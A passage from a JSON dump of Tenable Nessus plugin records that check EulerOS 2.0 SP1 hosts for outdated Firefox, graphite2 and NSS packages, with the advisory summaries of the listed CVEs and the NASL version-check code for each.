Use-after-free vulnerability in the mozilla::nsTextNodeDirectionalityMap::RemoveElementFrom Map function in Mozilla Firefox before 49.0 and Firefox ESR 45.x before 45.4 allows remote attackers to execute arbitrary code via bidirectional text.(CVE-2016-5280)\n\n - Use-after-free vulnerability in the DOMSVGLength class in Mozilla Firefox before 49.0 and Firefox ESR 45.x before 45.4 allows remote attackers to execute arbitrary code by leveraging improper interaction between JavaScript code and an SVG document.(CVE-2016-5281)\n\n - Mozilla Firefox before 49.0 and Firefox ESR 45.x before 45.4 rely on unintended expiration dates for Preloaded Public Key Pinning, which allows man-in-the-middle attackers to spoof add-on updates by leveraging possession of an X.509 server certificate for addons.mozilla.org signed by an arbitrary built-in Certification Authority.(CVE-2016-5284)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-01-08T00:00:00", "id": "EULEROS_SA-2016-1046.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99809", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : firefox (EulerOS-SA-2016-1046)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99809);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2019/01/08 11:01:15\");\n\n script_cve_id(\n \"CVE-2016-5250\",\n \"CVE-2016-5257\",\n \"CVE-2016-5261\",\n \"CVE-2016-5270\",\n \"CVE-2016-5272\",\n \"CVE-2016-5274\",\n \"CVE-2016-5276\",\n \"CVE-2016-5277\",\n \"CVE-2016-5278\",\n \"CVE-2016-5280\",\n \"CVE-2016-5281\",\n \"CVE-2016-5284\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : firefox (EulerOS-SA-2016-1046)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the firefox package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Mozilla Firefox before 48.0 allows remote attackers to\n obtain sensitive information about the previously\n retrieved page via Resource Timing API\n calls.(CVE-2016-5250)\n\n - Multiple unspecified vulnerabilities in the browser\n engine in Mozilla Firefox before 49.0 and Firefox ESR\n 45.x before 45.4 allow remote attackers to cause a\n denial of service (memory corruption and application\n crash) or possibly execute arbitrary code via unknown\n vectors.(CVE-2016-5257)\n\n - Integer overflow in the WebSocketChannel class in the\n WebSockets subsystem in Mozilla Firefox before 48.0\n allows remote attackers to execute arbitrary code or\n cause a denial of service (memory corruption) via\n crafted packets that trigger incorrect buffer-resize\n operations during buffering.(CVE-2016-5261)\n\n - Heap-based buffer overflow in the\n nsCaseTransformTextRunFactory::TransformString function\n in Mozilla Firefox before 49.0 and Firefox ESR 45.x\n before 45.4 allows remote attackers to cause a denial\n of service (boolean out-of-bounds write) or possibly\n have unspecified other impact via Unicode characters\n that are mishandled during text\n conversion.(CVE-2016-5270)\n\n - The nsImageGeometryMixin class in Mozilla Firefox\n before 49.0 and Firefox ESR 45.x before 45.4 does not\n properly perform a cast of an unspecified variable\n during handling of INPUT elements, which allows remote\n attackers to execute arbitrary code via a crafted web\n site.(CVE-2016-5272)\n\n - Use-after-free vulnerability in the\n nsFrameManager::CaptureFrameState function in Mozilla\n Firefox before 49.0 and Firefox ESR 45.x before 45.4\n allows remote attackers to execute arbitrary code by\n leveraging improper interaction between restyling and\n the Web Animations model implementation.(CVE-2016-5274)\n\n - Use-after-free vulnerability in the\n mozilla::a11y::DocAccessible::ProcessInvalidationList\n function in Mozilla Firefox before 49.0 and Firefox ESR\n 45.x before 45.4 allows remote attackers to execute\n arbitrary code or cause a denial of service (heap\n memory corruption) via an aria-owns\n attribute.(CVE-2016-5276)\n\n - Use-after-free vulnerability in the\n nsRefreshDriver::Tick function in Mozilla Firefox\n before 49.0 and Firefox ESR 45.x before 45.4 allows\n remote attackers to execute arbitrary code or cause a\n denial of service (heap memory corruption) by\n leveraging improper interaction between timeline\n destruction and the Web Animations model\n implementation.(CVE-2016-5277)\n\n - Heap-based buffer overflow in the\n nsBMPEncoder::AddImageFrame function in Mozilla Firefox\n before 49.0 and Firefox ESR 45.x before 45.4 allows\n remote attackers to execute arbitrary code via a\n crafted image data that is mishandled during the\n encoding of an image frame to an image.(CVE-2016-5278)\n\n - Use-after-free vulnerability in the\n mozilla::nsTextNodeDirectionalityMap::RemoveElementFrom\n Map function in Mozilla Firefox before 49.0 and Firefox\n ESR 45.x before 45.4 allows remote attackers to execute\n arbitrary code via bidirectional text.(CVE-2016-5280)\n\n - Use-after-free vulnerability in the DOMSVGLength class\n in Mozilla Firefox before 49.0 and Firefox ESR 45.x\n before 45.4 allows remote attackers to execute\n arbitrary code by leveraging improper interaction\n between JavaScript code and an SVG\n document.(CVE-2016-5281)\n\n - Mozilla Firefox before 49.0 and Firefox ESR 45.x before\n 45.4 rely on unintended expiration dates for Preloaded\n Public Key Pinning, which allows man-in-the-middle\n attackers to spoof add-on updates by leveraging\n possession of an X.509 server certificate for\n addons.mozilla.org signed by an arbitrary built-in\n Certification Authority.(CVE-2016-5284)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1046\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4bff0400\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected firefox packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"firefox-45.4.0-1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg, allowmaj:TRUE)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:30:30", "bulletinFamily": "scanner", "description": "According to the versions of the graphite2 package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - Various vulnerabilities have been discovered in Graphite2. An attacker able to trick an unsuspecting user into opening specially crafted font files in an application using Graphite2 could exploit these flaws to cause the application to crash or, potentially, execute arbitrary code with the privileges of the application. (CVE-2016-1521, CVE-2016-1522, CVE-2016-1523, CVE-2016-1526)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-14T00:00:00", "id": "EULEROS_SA-2016-1013.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99776", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : graphite2 (EulerOS-SA-2016-1013)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99776);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/14 14:36:22\");\n\n script_cve_id(\n \"CVE-2016-1521\",\n \"CVE-2016-1522\",\n \"CVE-2016-1523\",\n \"CVE-2016-1526\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : graphite2 (EulerOS-SA-2016-1013)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the graphite2 package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Various vulnerabilities have been discovered in\n Graphite2. An attacker able to trick an unsuspecting\n user into opening specially crafted font files in an\n application using Graphite2 could exploit these flaws\n to cause the application to crash or, potentially,\n execute arbitrary code with the privileges of the\n application. (CVE-2016-1521, CVE-2016-1522,\n CVE-2016-1523, CVE-2016-1526)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1013\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8e5249d9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected graphite2 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:graphite2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"graphite2-1.3.6-1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"graphite2\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:30:30", "bulletinFamily": "scanner", "description": "According to the version of the nss-util packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - A heap-based buffer overflow flaw was found in the way NSS parsed certain ASN.1 structures. An attacker could use this flaw to create a specially crafted certificate which, when parsed by NSS, could cause it to crash, or execute arbitrary code, using the permissions of the user running an application compiled against the NSS library.(CVE-2016-1950)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-14T00:00:00", "id": "EULEROS_SA-2016-1003.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99766", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : nss-util (EulerOS-SA-2016-1003)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99766);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/14 14:36:22\");\n\n script_cve_id(\n \"CVE-2016-1950\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : nss-util (EulerOS-SA-2016-1003)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the nss-util packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - A heap-based buffer overflow flaw was found in the way\n NSS parsed certain ASN.1 structures. An attacker could\n use this flaw to create a specially crafted certificate\n which, when parsed by NSS, could cause it to crash, or\n execute arbitrary code, using the permissions of the\n user running an application compiled against the NSS\n library.(CVE-2016-1950)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1003\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2a6a40bb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected nss-util package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"nss-util-3.21.0-3\",\n \"nss-util-devel-3.21.0-3\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nss-util\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:30:30", "bulletinFamily": "scanner", "description": "According to the versions of the firefox package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - Several flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2016-1952, CVE-2016-1954, CVE-2016-1957, CVE-2016-1958, CVE-2016-1960, CVE-2016-1961, CVE-2016-1962, CVE-2016-1973, CVE-2016-1974, CVE-2016-1964, CVE-2016-1965, CVE-2016-1966)\n\n - Multiple security flaws were found in the graphite2 font library shipped with Firefox. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2016-1977, CVE-2016-2790, CVE-2016-2791, CVE-2016-2792, CVE-2016-2793, CVE-2016-2794, CVE-2016-2795, CVE-2016-2796, CVE-2016-2797, CVE-2016-2798, CVE-2016-2799, CVE-2016-2800, CVE-2016-2801, CVE-2016-2802)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-14T00:00:00", "id": "EULEROS_SA-2016-1002.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99765", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : firefox (EulerOS-SA-2016-1002)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99765);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/14 14:36:22\");\n\n script_cve_id(\n \"CVE-2016-1952\",\n \"CVE-2016-1954\",\n \"CVE-2016-1957\",\n \"CVE-2016-1958\",\n \"CVE-2016-1960\",\n \"CVE-2016-1961\",\n \"CVE-2016-1962\",\n \"CVE-2016-1964\",\n \"CVE-2016-1965\",\n \"CVE-2016-1966\",\n \"CVE-2016-1973\",\n \"CVE-2016-1974\",\n \"CVE-2016-1977\",\n \"CVE-2016-2790\",\n \"CVE-2016-2791\",\n \"CVE-2016-2792\",\n \"CVE-2016-2793\",\n \"CVE-2016-2794\",\n \"CVE-2016-2795\",\n \"CVE-2016-2796\",\n \"CVE-2016-2797\",\n \"CVE-2016-2798\",\n \"CVE-2016-2799\",\n \"CVE-2016-2800\",\n \"CVE-2016-2801\",\n \"CVE-2016-2802\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : firefox (EulerOS-SA-2016-1002)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the firefox package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Several flaws were found in the processing of malformed\n web content. A web page containing malicious content\n could cause Firefox to crash or, potentially, execute\n arbitrary code with the privileges of the user running\n Firefox. (CVE-2016-1952, CVE-2016-1954, CVE-2016-1957,\n CVE-2016-1958, CVE-2016-1960, CVE-2016-1961,\n CVE-2016-1962, CVE-2016-1973, CVE-2016-1974,\n CVE-2016-1964, CVE-2016-1965, CVE-2016-1966)\n\n - Multiple security flaws were found in the graphite2\n font library shipped with Firefox. A web page\n containing malicious content could cause Firefox to\n crash or, potentially, execute arbitrary code with the\n privileges of the user running Firefox. (CVE-2016-1977,\n CVE-2016-2790, CVE-2016-2791, CVE-2016-2792,\n CVE-2016-2793, CVE-2016-2794, CVE-2016-2795,\n CVE-2016-2796, CVE-2016-2797, CVE-2016-2798,\n CVE-2016-2799, CVE-2016-2800, CVE-2016-2801,\n CVE-2016-2802)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?43f49690\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected firefox packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"firefox-38.7.0-1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg, allowmaj:TRUE)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:30:32", "bulletinFamily": "scanner", "description": "According to the versions of the nss nss-util packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - Multiple buffer handling flaws were found in the way NSS handled cryptographic data from the network. A remote attacker could use these flaws to crash an application using NSS or, possibly, execute arbitrary code with the permission of the user running the application. (CVE-2016-2834)\n\n - A NULL pointer dereference flaw was found in the way NSS handled invalid Diffie-Hellman keys. A remote client could use this flaw to crash a TLS/SSL server using NSS. (CVE-2016-5285)\n\n - It was found that Diffie Hellman Client key exchange handling in NSS was vulnerable to small subgroup confinement attack. An attacker could use this flaw to recover private keys by confining the client DH key to small subgroup of the desired group. (CVE-2016-8635)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-14T00:00:00", "id": "EULEROS_SA-2016-1084.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99843", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : nss\nnss-util (EulerOS-SA-2016-1084)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99843);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/14 14:36:22\");\n\n script_cve_id(\n \"CVE-2016-2834\",\n \"CVE-2016-5285\",\n \"CVE-2016-8635\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : nss\nnss-util (EulerOS-SA-2016-1084)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the nss nss-util packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Multiple buffer handling flaws were found in the way\n NSS handled cryptographic data from the network. A\n remote attacker could use these flaws to 